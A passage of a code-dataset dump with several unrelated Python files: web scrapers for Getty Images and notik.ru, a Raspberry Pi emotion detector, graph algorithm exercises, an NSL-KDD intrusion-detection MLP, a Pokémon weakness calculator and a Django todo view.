os.path.exists(path): os.mkdir(path)\n filename = \"{}-{}.jpg\".format(timestamp, ppid)\n with open(path + filename , 'wb') as f:\n f.write(response.content)\n return path+filename\n return None\n \n def parse_query_html_data(self, response):\n results = []\n soup = BeautifulSoup(response.content, \"html.parser\")\n\n img_divs = soup.find_all(\"div\", {\"data-testid\": \"galleryMosaicAsset\"})\n\n for div in img_divs:\n img_url = None\n local_path = None\n title = None\n caption = None\n\n # URL\n img_elem = div.find(\"img\", {\"class\": \"BLA_wBUJrga_SkfJ8won\"})\n if img_elem:\n img_url = img_elem[\"src\"]\n local_path = self.download_image(img_url)\n title = img_elem[\"alt\"]\n\n detail_url_elem = div.find(\"a\", {\"class\": \"TV1lZmIBFh_LgfiQqK1O\"})\n if detail_url_elem:\n # Caption\n detail_url = 'https://www.gettyimages.es' + detail_url_elem['href']\n print(detail_url)\n response = self.image_detail_request(detail_url)\n caption = self.parse_image_detail_html_data(response)\n\n results.append([img_url, local_path, title, caption])\n\n return results\n \n def result_to_csv(self, results_list, path, query):\n if not os.path.exists(path): \n os.mkdir(path)\n filename = \"gettyimages_\" + query.replace(\" \", \"_\") + \".csv\"\n with open(path+filename, \"w\", encoding=\"utf-8\", newline='') as file:\n writer = csv.writer(file)\n writer.writerow([\"img_url\", \"local_path\", \"title\", \"caption\"])\n writer.writerows(results_list)\n\n def scrap(self):\n for query in self.queries:\n print(\"Starting query: {}\".format(query))\n search_query = query.replace(' ', '-')\n gettyimagge_base_url = 'https://www.gettyimages.es/fotos/{0}'.format(search_query)\n \n final_results_list = []\n for i in tqdm(range(1, self.num_pages+1)):\n response = self.query_request(gettyimagge_base_url, i)\n results = self.parse_query_html_data(response)\n\n if len(final_results_list) == 0:\n final_results_list = results\n else:\n final_results_list = np.concatenate((results, final_results_list), axis=0)\n \n print(\"{} images scrapped\".format(len(final_results_list)))\n\n if len(final_results_list) > 0:\n path = \"./data/captions/raw/\"\n self.result_to_csv(final_results_list, path, query)\n","repo_name":"TheMrguiller/MUCSI_Modal","sub_path":"src/scrappers/gettyimages_scrapper.py","file_name":"gettyimages_scrapper.py","file_ext":"py","file_size_in_byte":4852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10430354723","text":"from fer import FER\nimport cv2\nimport pprint\nfrom picamera import PiCamera\nfrom PIL import Image\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef convertToRGB(image):\n return cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\ndef init_cam():\n #sets up Picam, can be altered for normal webcam\n camera = PiCamera()\n camera.resolution = (1024, 768)\n print('Camera initialized')\n return camera\n\ndef get_emotion(camera):\n \n result=[]\n faces_rects=[]\n ##repeatedly takes photos and checks each for valid face with expression, can change later for more specificity in selection\n while not np.any(faces_rects):\n camera.capture(\"/home/pi/fer-21.0.5/tests/sample.jpg\")\n image = cv2.imread(\"/home/pi/fer-21.0.5/tests/sample.jpg\")\n test_image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n haar_cascade_face = cv2.CascadeClassifier('/home/pi/opencv/data/haarcascades/haarcascade_frontalface_alt2.xml')\n faces_rects = haar_cascade_face.detectMultiScale(test_image_gray, scaleFactor = 1.2, minNeighbors = 5);\n print('Faces found: ', len(faces_rects))\n #Remainder of code only necessary for visual display of info, if the program only needs to know emotions internally, program can stop here\n for (x,y,w,h) in faces_rects:\n cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)\n plt.imshow(convertToRGB(image))\n detector = FER()\n result = detector.detect_emotions(image)\n result2 = detector.top_emotion(image)\n bounding_box = result[0][\"box\"]\n emotions = result[0][\"emotions\"]\n \n print('got image')\n \n cv2.rectangle(\n image,\n (bounding_box[0], bounding_box[1]),\n (bounding_box[0] + bounding_box[2], bounding_box[1] + bounding_box[3]),\n (0, 155, 255),\n 2,\n )\n\n for idx, (emotion, score) in enumerate(emotions.items()):\n color = (211, 211, 211) if score < 0.01 else (0, 255, 0)\n emotion_score = \"{}: {}\".format(\n emotion, \"{:.2f}\".format(score) if score > 0.01 else \"\")\n cv2.putText(\n image,\n emotion_score,\n (bounding_box[0], bounding_box[1] + bounding_box[3] + 30 + idx * 15),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.5,\n color,\n 1,\n cv2.LINE_AA,\n )\n cv2.imwrite(\"/home/pi/fer-21.0.5/tests/sample.jpg\", image)\n\n img=Image.open(\"/home/pi/fer-21.0.5/tests/sample.jpg\")\n #img.show() #use for testing purposes, displays imgage w box\n #delete \"user data\" at end of execution\n os.remove(\"/home/pi/fer-21.0.5/tests/sample.jpg\")\n \n return result2\n\nif __name__ == '__main__':\n camera = init_cam()\n for i in range(3):\n print(get_emotion(camera))\n camera.close()\n\n","repo_name":"John-priv/student_sentiment_sensor","sub_path":"backend/cv.py","file_name":"cv.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3891650588","text":"class Graph:\n def __init__(self, noOfVertex):\n self.v = noOfVertex\n self.graph = [[] for i in range(self.v) ]\n\n def addEdge(self, frm, to):\n self.graph[frm].append(to)\n\n #For undirected\n self.graph[to].append(frm)\n\n def printGraph(self):\n for i in self.graph:\n print(i)\n\n def dfsOfGraph(self):\n visited = [ False for i in range(self.v) ]\n stk = list()\n dfsans = []\n\n stk.append(0)\n \n self.mydfs(visited, stk, dfsans)\n return dfsans\n \n def mydfs(self, visited, stk, dfsans):\n temp = stk.pop()\n visited[temp] = True\n dfsans.append(temp)\n \n for i in self.graph[temp]:\n if visited[i] is False:\n visited[i] = True\n stk.append(i)\n self.mydfs(visited, stk, dfsans)\n\n\nmyGraph = Graph(5)\n\nmyGraph.addEdge(0,3)\nmyGraph.addEdge(1,3)\nmyGraph.addEdge(2,3)\nmyGraph.addEdge(4,3)\nmyGraph.addEdge(1,4)\nmyGraph.addEdge(2,4) \n\n#myGraph.printGraph()\n\nprint(myGraph.dfsOfGraph())","repo_name":"safibadi/DSA","sub_path":"Graph/Adj List/DFS_Adj_list.py","file_name":"DFS_Adj_list.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74860872412","text":"from functions import *\nfrom Variables import *\nimport Raw_data_processing\n\n\ndef mobileDefectOcc_compute(period, ID, M_treated_occ):\n occ = 0\n i = 1\n for mess in M_treated_occ:\n gps_field = mess.decode_GPS()\n obu_date = dateStringToIntConvert(gps_field[GPS_DATE])\n obu_data = mess.OBU_DATA\n obu_id = mess.OBU_ID\n obu_time = gps_field[GPS_TIME]\n obu_time = int(obu_time[0:6])\n if((dateStringToIntConvert(period[0]) <= obu_date < dateStringToIntConvert(period[1])) and (obu_id == ID) and (mess.double_check == 0)):\n occ = occ + 1\n return occ\n\ndef mobileDefectTotalOcc_compute(period, ID, M_treated_occTotal):\n occ = 0\n i = 1\n for mess in M_treated_occTotal:\n gps_field = mess.decode_GPS()\n obu_date = dateStringToIntConvert(gps_field[GPS_DATE])\n obu_data = mess.OBU_DATA\n obu_id = mess.OBU_ID\n obu_time = gps_field[GPS_TIME]\n obu_time = int(obu_time[0:6])\n if((dateStringToIntConvert(period[0]) <= obu_date < dateStringToIntConvert(period[1])) and (obu_id == ID) and (mess.double_check == 0)):\n occ = occ + 1\n return occ\n\n \ndef trainOpTime_compute(period, ID, M_treated_tot):\n tuples = []\n for mess in M_treated_tot:\n gps_field = mess.decode_GPS()\n obu_date = dateStringToIntConvert(gps_field[GPS_DATE])\n obu_data = mess.OBU_DATA\n obu_id = mess.OBU_ID\n obu_time = gps_field[GPS_TIME]\n obu_time = int(obu_time[0:6])\n if((dateStringToIntConvert(period[0]) <= obu_date < dateStringToIntConvert(period[1])) and (obu_id == ID)):\n index = findIndexof(mess.OBU_DATA, ',', 17)\n TRAIN_OP_TIME = int(obu_data[(index[0]+1):(index[1])])\n tuples.append((TRAIN_OP_TIME,obu_date,obu_time))\n tuples_sorted = sorted(tuples, key = lambda x: (x[1],x[2]))\n i = 0\n TOT = []\n for t in tuples_sorted:\n print(t[0],t[1],t[2])\n TOT.append(t[0])\n i = i + 1\n offset = 0\n for i in range(0,len(TOT)-1):\n #print(TOT[i])\n if((TOT[i+1] < TOT[i]) and ((TOT[i]-TOT[i+1]) > 10)):\n #print('cc')\n offset = TOT[i]\n index = i\n print('Reset comet or anomaly (TOT): '+str(tuples_sorted[index]))\n break\n if(offset > 0):\n for i in range(index+1,len(TOT)):\n TOT[i] = TOT[i] + offset\n #print(TOT[i])\n '''for i in TOT:\n print(i)'''\n if(len(TOT) == 0):\n return 0\n else:\n return (max(TOT)-min(TOT))\n\n\n\ndef kmODO_compute(period, ID, M_treated_tot):\n tuples = []\n for mess in M_treated_tot:\n gps_field = mess.decode_GPS()\n obu_date = dateStringToIntConvert(gps_field[GPS_DATE])\n obu_data = mess.OBU_DATA\n obu_id = mess.OBU_ID\n obu_time = gps_field[GPS_TIME]\n obu_time = int(obu_time[0:6])\n if((dateStringToIntConvert(period[0]) <= obu_date < dateStringToIntConvert(period[1])) and (obu_id == ID)):\n index = findIndexof(mess.OBU_DATA, ',', 17)\n km_odo = int(obu_data[(index[7]+1):(index[8])])\n km_gps = int(obu_data[(index[6]+1):(index[7])])\n tuples.append((km_odo,km_gps,obu_date,obu_time))\n tuples_sorted = sorted(tuples, key = lambda x: (x[2],x[3]))\n i = 0\n KM_ODO = []\n for t in tuples_sorted:\n print(i,t[0],t[1],t[2])\n KM_ODO.append(t[0])\n i = i + 1\n offset = 0\n for i in range(0,len(KM_ODO)-1):\n #print(KM_ODO[i])\n if((KM_ODO[i+1] < KM_ODO[i])):\n #print('cc')\n offset = KM_ODO[i]\n index = i\n print('======= '+str(index))\n print('Reset comet or anomaly (ODO): '+str(tuples_sorted[index]))\n break\n if(offset > 0):\n for i in range(index+1,len(KM_ODO)):\n KM_ODO[i] = KM_ODO[i] + offset\n #print(KM_ODO[i])\n '''for i in TOT:\n print(i)'''\n if(len(KM_ODO) == 0):\n return 0\n else:\n return (KM_ODO[len(KM_ODO)-1]-KM_ODO[0])\n\n\n\n\ndef kmODO_trainOpTime_compute(period, ID, M_treated_tot):\n tuples_odo = []\n tuples_tot = []\n km_final = 0\n tot_final = 0\n comet_init_odo = []\n comet_init_tot = []\n COMET_FLAG_ODO = 0\n COMET_FLAG_TOT = 0\n for mess in M_treated_tot:\n gps_field = mess.decode_GPS()\n obu_date = dateStringToIntConvert(gps_field[GPS_DATE])\n obu_data = mess.OBU_DATA\n obu_id = mess.OBU_ID\n obu_time = gps_field[GPS_TIME]\n obu_time = int(obu_time[0:6])\n if((dateStringToIntConvert(period[0]) <= obu_date < dateStringToIntConvert(period[1])) and (obu_id == ID)):\n index = findIndexof(mess.OBU_DATA, ',', 17)\n tot = int(obu_data[(index[0]+1):(index[1])])\n km_odo = int(obu_data[(index[7]+1):(index[8])])\n tuples_tot.append((tot,obu_date,obu_time))\n tuples_odo.append((km_odo,obu_date,obu_time))\n tuples_odo_sorted = sorted(tuples_odo, key = lambda x: (x[1],x[2]))\n tuples_tot_sorted = sorted(tuples_tot, key = lambda x: (x[1],x[2]))\n i = 0\n TOT = []\n KM_ODO = []\n Date_odo = []\n Date_tot = []\n for k in range(0,len(tuples_odo_sorted)):\n t_odo = tuples_odo_sorted[k]\n t_tot = tuples_tot_sorted[k]\n KM_ODO.append(t_odo[0])\n TOT.append(t_tot[0])\n Date_odo.append(t_odo[1])\n Date_tot.append(t_tot[1])\n offset_odo = 0\n offset_tot = 0\n for i in range(0,len(KM_ODO)-1):\n #print(KM_ODO[i])\n if((KM_ODO[i+1] < KM_ODO[i]) and (((KM_ODO[i]-KM_ODO[i+1])/KM_ODO[i]) > 0.1)):\n COMET_FLAG_ODO = 1\n offset_odo = KM_ODO[i]\n index_odo = i\n comet_init_odo = [Date_odo[i],KM_ODO[i],Date_odo[i+1],KM_ODO[i+1]]\n print('Reset comet or anomaly (ODO)')\n break\n for i in range(0,len(TOT)-1):\n #print(KM_ODO[i])\n if((TOT[i+1] < TOT[i]) and (((TOT[i]-TOT[i+1])/TOT[i]) > 0.1)):\n COMET_FLAG_TOT = 1\n offset_tot = TOT[i]\n index_tot = i\n comet_init_tot = [Date_tot[i],TOT[i],Date_tot[i+1],TOT[i+1]]\n print('Reset comet or anomaly (TOT)')\n break\n if(offset_odo > 0):\n for i in range(index_odo+1,len(KM_ODO)):\n KM_ODO[i] = KM_ODO[i] + offset_odo\n #print(KM_ODO[i])\n if(offset_tot > 0):\n for i in range(index_tot+1,len(TOT)):\n TOT[i] = TOT[i] + offset_tot\n #print(TOT[i])\n if(len(KM_ODO) == 0):\n km_final = 0\n else:\n km_final = (KM_ODO[len(KM_ODO)-1]-KM_ODO[0])\n if(len(TOT) == 0):\n tot_final = 0\n else:\n tot_final = (TOT[len(KM_ODO)-1]-TOT[0])\n\n return [COMET_FLAG_ODO,COMET_FLAG_TOT,comet_init_odo,comet_init_tot,km_final,tot_final]\n \n \n\ndef double_check(M_treated_occ):\n for i in range(0,len(M_treated_occ)-1):\n gps_field_curr = M_treated_occ[i].decode_GPS()\n gps_field_next = M_treated_occ[i+1].decode_GPS()\n if((gps_field_curr[GPS_DATE] == gps_field_next[GPS_DATE]) and (gps_field_curr[GPS_TIME] == gps_field_next[GPS_TIME]) \\\n and (M_treated_occ[i].OBU_ID == M_treated_occ[i+1].OBU_ID)):\n M_treated_occ[i+1].double_check = 1\n","repo_name":"Yass2501/BDK_RMR_py","sub_path":"src/Statistics_processing.py","file_name":"Statistics_processing.py","file_ext":"py","file_size_in_byte":7292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3481541349","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2020/11/10 10:53 上午\n@Auth : Robbie Deng\n@File :MLP.py\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n\n#################\n# data processing\n\ndos_type = ['back', 'land', 'neptune', 'pod', 'smurf', 'teardrop', 'processtable', 'udpstorm', 'mailbomb', 'apache2']\nprobing_type = ['ipsweep', 'mscan', 'nmap', 'portsweep', 'saint', 'satan']\nr2l_type = ['ftp_write', 'guess_passwd', 'imap', 'multihop', 'phf', 'warezmaster', 'warezclient', 'spy', 'sendmail',\n 'xlock', 'snmpguess', 'named', 'xsnoop', 'snmpgetattack', 'worm']\nu2r_type = ['buffer_overflow', 'loadmodule', 'perl', 'rootkit', 'xterm', 'ps', 'httptunnel', 'sqlattack']\ntype2id = {'normal': 0}\n\nfor i in dos_type:\n type2id[i] = 1\nfor i in probing_type:\n type2id[i] = 1\nfor i in r2l_type:\n type2id[i] = 1\nfor i in u2r_type:\n type2id[i] = 1\n\n# protocol -> id\nall_protocol = ['tcp', 'udp', 'icmp']\nprotocol_dict = {}\nfor id, name in enumerate(all_protocol):\n protocol_dict[name] = id\n\n# service -> id total:70\nall_service = ['aol', 'auth', 'bgp', 'courier', 'csnet_ns', 'ctf', 'daytime', 'discard', 'domain', 'domain_u', 'echo',\n 'eco_i', 'ecr_i', 'efs', 'exec', 'finger', 'ftp', 'ftp_data', 'gopher', 'harvest', 'hostnames', 'http',\n 'http_2784', 'http_443', 'http_8001', 'imap4', 'IRC', 'iso_tsap', 'klogin', 'kshell', 'ldap', 'link',\n 'login', 'mtp', 'name', 'netbios_dgm', 'netbios_ns', 'netbios_ssn', 'netstat', 'nnsp', 'nntp', 'ntp_u',\n 'other', 'pm_dump', 'pop_2', 'pop_3', 'printer', 'private', 'red_i', 'remote_job', 'rje', 'shell',\n 'smtp', 'sql_net', 'ssh', 'sunrpc', 'supdup', 'systat', 'telnet', 'tftp_u', 'tim_i', 'time', 'urh_i',\n 'urp_i', 'uucp', 'uucp_path', 'vmnet', 'whois', 'X11', 'Z39_50']\nservice_dict = {}\nfor id, name in enumerate(all_service):\n service_dict[name] = id\n\n# flag -> id\nall_flag = ['OTH', 'REJ', 'RSTO', 'RSTOS0', 'RSTR', 'S0', 'S1', 'S2', 'S3', 'SF', 'SH']\nflag_dict = {}\nfor id, name in enumerate(all_flag):\n flag_dict[name] = id\n\n####################\n# read training data\nimport csv\n\nall_train_data = []\ntrainX = []\ntrainY = []\nwith open('KDDTrain+.txt', newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n for row in csvreader:\n all_train_data.append(row)\n\nfor row in all_train_data:\n row[1] = protocol_dict[row[1]]\n row[2] = service_dict[row[2]]\n row[3] = flag_dict[row[3]]\n row[-2] = type2id[row[-2]]\n trainX.append(row[:41])\n trainY.append(row[-2])\ntrain_label = []\nfor i in trainY:\n label_list = [0 for num in range(2)]\n label_list[int(i)] = 1\n train_label.append(label_list)\n\nprint(np.array(trainX).shape)\nprint(np.array(trainY).shape)\n\n\n# parameters\ntraining_epoch = 20\nlearning_rate = 0.001\nbatch_size = 32\ntotal_batch = int(len(trainY) / batch_size)\n\n################\n# read test data\nall_test_data = []\ntestX = []\ntestY = []\nwith open('KDDTest+.txt', newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n for row in csvreader:\n all_test_data.append(row)\nfor row in all_test_data:\n row[1] = protocol_dict[row[1]]\n row[2] = service_dict[row[2]]\n row[3] = flag_dict[row[3]]\n row[-2] = type2id[row[-2]]\n testX.append(row[:41])\n testY.append(row[-2])\ntest_label =[]\nfor i in testY:\n label_list = [0 for num in range(2)]\n label_list[int(i)] = 1\n test_label.append(label_list)\n\nprint(np.array(testX).shape)\nprint(np.array(testY).shape)\n\n# placeholder\nx = tf.placeholder(tf.float32, [None, 41])\ny = tf.placeholder(tf.float32, [None, 2])\nkeep_prob = tf.placeholder(tf.float32)\n\n# MLP\nW1 = tf.get_variable('W1', shape=[41, 30], initializer=tf.contrib.layers.xavier_initializer())\nb1 = tf.Variable(tf.random_normal([30]))\nL1 = tf.nn.relu(tf.matmul(x, W1) + b1)\nL1 = tf.nn.dropout(L1, keep_prob=keep_prob)\n\nW2 = tf.get_variable('W2', shape=[30, 30], initializer=tf.contrib.layers.xavier_initializer())\nb2 = tf.Variable(tf.random_normal([30]))\nL2 = tf.nn.relu(tf.matmul(L1, W2) + b2)\nL2 = tf.nn.dropout(L2, keep_prob=keep_prob)\n\nW3 = tf.get_variable('W3', shape=[30, 30], initializer=tf.contrib.layers.xavier_initializer())\nb3 = tf.Variable(tf.random_normal([30]))\nL3 = tf.nn.relu(tf.matmul(L2, W3) + b3)\nL3 = tf.nn.dropout(L3, keep_prob=keep_prob)\n\nW4 = tf.get_variable('W4', shape=[30, 30], initializer=tf.contrib.layers.xavier_initializer())\nb4 = tf.Variable(tf.random_normal([30]))\nL4 = tf.nn.relu(tf.matmul(L3, W4) + b4)\nL4 = tf.nn.dropout(L4, keep_prob=keep_prob)\n\nW5 = tf.get_variable('W5', shape=[30, 2], initializer=tf.contrib.layers.xavier_initializer())\nb5 = tf.Variable(tf.random_normal([2]))\nhypothesis = tf.nn.relu(tf.matmul(L4, W5) + b5)\n\n# define cost/loss & optimizer\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=hypothesis, labels=y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\nprint('==Training started!!!==')\nfor epoch in range(training_epoch):\n avg_cost = 0\n\n for i in range(total_batch):\n x_train = trainX[i * batch_size:(i+1) * batch_size]\n y_train = train_label[i * batch_size:(i+1) * batch_size]\n c, _ = sess.run([cost, optimizer], feed_dict={x: x_train, y: y_train, keep_prob: 0.7})\n avg_cost += c / total_batch\n\n print('Epoch', '%03d' % (epoch + 1), 'cost=', '%.9f' % avg_cost)\nprint('==Training finished!!!==')\n\ncorrect_prediction = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nprint('Accuracy', sess.run(accuracy, feed_dict={x: testX, y: test_label, keep_prob: 1}))","repo_name":"RobbyDeng/NSL-KDD_MLP-AE","sub_path":"MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42153325581","text":"from collections import deque\n\n\n# https://leetcode.com/problems/clone-graph\n# Medium\n# T = O(V + E) - For BFS/DFS\n# S = O(N) - For the dict\n\nclass Node:\n def __init__(self, val=0, neighbors=None):\n self.val = val\n self.neighbors = neighbors if neighbors else []\n\n\ndef cloneGraph(node: Node) -> Node:\n if not node:\n return node\n new = Node(node.val)\n visited = {1: new}\n\n q = deque()\n q.append(node)\n\n while q:\n n = q.popleft()\n for x in n.neighbors:\n if x.val not in visited:\n visited[x.val] = Node(x.val)\n q.append(x)\n visited[n.val].neighbors.append(visited[x.val])\n\n return new\n\n\n# Adjacency list is index + 1. So the first element of adjacency_list are neighbors for Node 1\ndef buildNodeGraph(adjacency_list):\n if not adjacency_list:\n return None\n node = Node(1)\n n = {1: node}\n\n for i, (x, y) in enumerate(adjacency_list):\n if x not in n:\n n[x] = Node(x)\n if y not in n:\n n[y] = Node(y)\n\n n[i + 1].neighbors.append(n[x])\n n[i + 1].neighbors.append(n[y])\n return node\n\n\ndef buildAdjacencyList(node: Node):\n if not node:\n return []\n q = deque()\n q.append(node)\n\n n = {1: []} # first node's value is 1\n\n while q:\n popped = q.popleft()\n for x in popped.neighbors:\n if x.val not in n:\n n[x.val] = []\n q.append(x)\n n[popped.val].append(x.val)\n\n adjacency_list = [None] * len(n)\n for i in range(1, len(n) + 1):\n adjacency_list[i - 1] = n[i]\n return adjacency_list\n","repo_name":"IamConstantine/LeetCodeFiddle","sub_path":"python/CloneGraph.py","file_name":"CloneGraph.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24420624907","text":"import pandas as pd\n\n\ntyping_weakness = pd.read_csv(r\"D:\\Programming and Coding\\Pokemon Project\\Pokemon Type Chart.csv\") #.T causign issues below\ntyping_weakness = typing_weakness.set_index(\"Type\")\n\npokemon_data = pd.read_csv(r\"D:\\Programming and Coding\\Pokemon Project\\pokemon_data.csv\")\n\n\"\"\"\nask for pokemon -- go by name (can do pokedex# if remove megas)\ntake that pokemon's typing and cross-refernce with weakness chart\nif one typing, straightforward\n2-typing, have to multiply 2 values\noutput damage multipliers i.e. Pokemon weaknesses are: xxxxx\n\n\"\"\"\n\n\n#merge = pd.merge(pokemon_data, typing_weakness, on= 'Type')\n#merge = pd.merge(pokemon_data, typing_weakness, left_on=\"Other Type\", right_on=\"Type\")\n#print(merge)\n\n\npokemon_name = input('\\nWhat Pokemon would you like to know the weakness for? ')\n\n#make sure first letter is capitalized each part of name catch statement!?!?\n\n\npokemon_stats = pokemon_data[(pokemon_data.Name == pokemon_name)] ##.Name pulls the row\nprint(pokemon_stats)\nprint(\"\\n\")\n#print('Weaknesses for ', pokemon_name, ' are:')\n\n\npokemon_type1 = pokemon_stats.at[pokemon_stats.index[0],\"Type\"]\n\npokemon_type2 = pokemon_stats.at[pokemon_stats.index[0],\"Other Type\"]\n\n\n#print(typing_weakness[pokemon_type1]) #..._type1] ['Dark'] to give just a specific value\n#print(typing_weakness[pokemon_type2])\n\nprint(pokemon_name + \"\\'s weakness chart:\\n\") \n\nif pd.isna(pokemon_type2):\n pokemon_weakness = typing_weakness[pokemon_type1]\n print(pokemon_weakness)\nelse:\n #multiply array.at(pokemontype1) by array.at(pokemontype2)\n array1 = typing_weakness[pokemon_type1]\n array2 = typing_weakness[pokemon_type2]\n pokemon_weakness = array1 * array2\n print(pokemon_weakness)\n\n\n","repo_name":"mrezut/PokemonWeaknessCalculator","sub_path":"PokemonWeaknessChart.py","file_name":"PokemonWeaknessChart.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"48637029892","text":"import scrapy\nfrom scrapy.spiders import CrawlSpider, Spider\nimport re\n\nclass ComputersSpider(CrawlSpider):\n name = 'notik'\n allowed_domains = ['notik.ru']\n start_urls = [\n \"https://www.notik.ru/search_catalog/filter/brand.htm\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=2\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=3\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=4\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=5\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=6\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=7\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=8\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=9\",\n \"https://www.notik.ru/search_catalog/filter/brand.htm?page=10\"\n ]\n\n default_headers = {}\n\n def scrap_computers(self, response):\n\n for card in response.xpath(\"//tr[@class='goods-list-table']\"):\n price_selector = card.xpath(\".//td[@class='glt-cell gltc-cart']\")\n price = re.findall(r'\\d+', price_selector.xpath(\".//b\").css(\"::text\").get())\n price = int(\"\".join(price))\n ecname = price_selector.xpath(\".//a\").attrib.get(\"ecname\")\n yield {ecname : {\"price\" : price}}\n\n def parse_start_url(self, response, **kwargs):\n url = self.start_urls[0]\n for url in self.start_urls:\n yield response.follow(\n url, callback=self.scrap_computers, headers=self.default_headers\n )\n\n# class NotikSpider(scrapy.Spider):\n# name = 'notik'\n# allowed_domains = ['notik.ru']\n# start_urls = ['http://notik.ru/']\n\n# def parse(self, response):\n# pass\n","repo_name":"Avnekt/innopolis_2","sub_path":"spiders/notik.py","file_name":"notik.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74530530330","text":"import logging\nfrom django.shortcuts import render, redirect\nfrom .models import Todo, Category\n\nlogger = logging.getLogger(__name__)\n\n# Create your views here.\n\ndef index(request): # the index view\n todo_list = Todo.objects.all() # querying all todos with the object manager\n categories = Category.objects.all() # getting all categories with object manager\n current_todo = Todo.objects.filter(completion='todo')\n current_in_progress = Todo.objects.filter(completion='inProgress')\n current_completed = Todo.objects.filter(completion='completed')\n cat_todos = {}\n for cat in categories:\n categorized_todo = Todo.objects.filter(category=cat.id)\n cat_todos[cat.name] = categorized_todo\n\n for t in todo_list:\n t.dueness_calculator()\n t.save()\n logger.info(t.dueness)\n\n categorized_todos = cat_todos.items()\n\n if (request.method == \"POST\"): # checking if the request method is a POST\n logger.info(request.POST)\n if (\"todoAdd\" in request.POST): # checking if there is a request to add a todo\n logger.info(\"todo add being called\")\n title = request.POST[\"description\"] # title\n todo_date = str(request.POST[\"date\"]) # date\n category = request.POST[\"category_select\"] # category\n content = title + \" -- \" + todo_date + \" -- \" + category # content\n current_todo = Todo(title=title, content=content, due_date=todo_date, category=Category.objects.get(name=category), completion=\"todo\", dueness=0)\n current_todo.save() # saving the todo\n return redirect(\"/\") # reloading the page\n\n if (\"todoDelete\" in request.POST): # checking if there is a request to delete a todo\n todo_id = request.POST[\"todoDelete\"]\n current_todo = Todo.objects.get(id=int(todo_id)) # getting todo id\n current_todo.delete() # deleting todo\n return redirect(\"/\") # reloading the page\n\n if (\"editTodo\" in request.POST):\n todo_id = request.POST[\"editTodo\"]\n current_todo = Todo.objects.get(id=int(todo_id))\n logger.info(todo_id)\n logger.info(current_todo.title)\n logger.info(current_todo.due_date)\n logger.info(current_todo.category)\n logger.info(current_todo.content)\n current_todo.title = request.POST[\"edit_description\" + todo_id] or current_todo.title\n current_todo.due_date = str(request.POST[\"edit_due_date\" + todo_id]) or str(current_todo.due_date)\n updated_category = request.POST[\"edit_category_select\" + todo_id] or current_todo.category\n current_todo.category = Category.objects.get(name=updated_category)\n current_todo.content = current_todo.title + \" -- \" + current_todo.due_date + \" -- \" + str(current_todo.category)\n logger.info(current_todo)\n current_todo.save()\n return redirect(\"/\")\n\n if (\"categoryAdd\" in request.POST):\n category_name = request.POST[\"category\"] # category\n current_cat = Category(name=category_name)\n current_cat.save()\n return redirect(\"/\") # reloading the page\n \n if (\"categoryDelete\" in request.POST): # checking if there is a request to delete a category\n category_id = request.POST[\"categoryDelete\"]\n current_cat = Category.objects.get(id=int(category_id)) # getting category by id\n current_cat.delete() # deleting category\n return redirect(\"/\") # reloading the page\n\n # TODO: add in backend functionality for switching from todo, inprogress, and complete\n if (\"todo\" in request.POST or \"inProgress\" in request.POST or \"completed\" in request.POST):\n if (\"todo\" in request.POST):\n logger.info(\"todo being called\")\n todo_id = request.POST[\"todo\"]\n logger.info(\"todo is in the name\")\n current_todo = Todo.objects.get(id=int(todo_id)) # use todo ID to get the todo\n current_todo.completion = \"todo\"\n current_todo.save()\n return redirect(\"/\") # reloading the page\n\n if (\"inProgress\" in request.POST):\n logger.info(\"in progress add being called\")\n todo_id = request.POST[\"inProgress\"]\n logger.info(todo_id)\n current_todo = Todo.objects.get(id=int(todo_id)) # use todo ID to get the todo\n current_todo.completion = \"inProgress\"\n current_todo.save()\n return redirect(\"/\") # reloading the page\n\n if (\"completed\" in request.POST):\n logger.info(\"completed being called\")\n todo_id = request.POST[\"completed\"]\n logger.info(\"completed is in the name\")\n current_todo = Todo.objects.get(id=int(todo_id)) # use todo ID to get the todo\n current_todo.completion = \"completed\"\n current_todo.save()\n return redirect(\"/\") # reloading the page\n\n return render(request, \"index.html\", {\"todo_list\": todo_list, \"categories\": categories, \"todo\": current_todo, \"in_progress\": 